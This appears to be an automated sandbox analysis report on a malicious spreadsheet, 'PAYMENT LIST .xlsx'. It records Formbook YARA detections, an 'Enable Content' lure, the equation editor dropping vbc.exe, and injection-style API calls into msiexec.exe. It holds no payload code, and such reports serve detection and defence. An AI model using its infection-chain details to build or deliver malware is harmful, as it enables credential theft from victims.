          Source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 22 23 24 25 26 27 28 0 29 . 30 31 32 33 34 3
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181BB NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041826A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009107AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009110D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009101D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00911148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00911930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00911D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02650060 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02650078 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02650048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026510D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02651148 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0265010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026501D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02651930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02650C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0264FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02651D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A8270 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A82F0 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A81BB NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A826A NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0244632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02446332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024467C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003220B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00321B08
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00321DF8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003220A0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00323A58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00323A48
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00321DE7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C2B1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CB27
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B4A3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C525
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00923040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C63BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009463DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00922305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00927353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00955485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00931489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00966540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00924680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009557C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009C098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009229B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009369FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009D3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009CCBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009ADBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00947B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00950D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00952E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009BCFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00992FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00930F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094DF7C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02701238
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0265E2E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026AA37B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02667353
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02662305
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0265F3CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026863DB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_027063BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02663040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0267905A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0268D005
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0265E0C6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02702622
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026AA634
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0266E6C1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02664680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026957C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0266C7BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026E579A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0269D47D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026E443E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02695485
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02671489
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026A6540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0266351F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0267C5F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02713A83
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02687B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0265FBD7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026EDBDA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0270CBA4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0268286D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0266C85C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026FF8EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026E394B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026E5955
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026769FE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026629B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0270098E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0267EE4C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02692E2F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0268DF7C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02670F3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026D2FDC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026FCFB1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0266CD5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02690D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026FFDDD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AC525
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000ACB27
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00098C5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00098C60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00092D87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00092D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00092FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024467C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024432FF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02441362
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02443302
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02445062
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024475B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024408F9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02440902
          Source: PAYMENT LIST .xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 0091E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0091DF5C appears 119 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0098F970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0096373B appears 245 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00963F92 appears 132 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0265DF5C appears 119 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0265E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026A3F92 appears 132 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026A373B appears 244 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026CF970 appears 84 times
          Source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: winlog[1].exe.2.dr, BowenTheatre.Bookings/Encrypta??o.csCryptographic APIs: 'TransformFinalBlock'
          Source: winlog[1].exe.2.dr, BowenTheatre.Bookings/Encrypta??o.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 4.2.vbc.exe.1300000.3.unpack, BowenTheatre.Bookings/Encrypta??o.csCryptographic APIs: 'TransformFinalBlock'
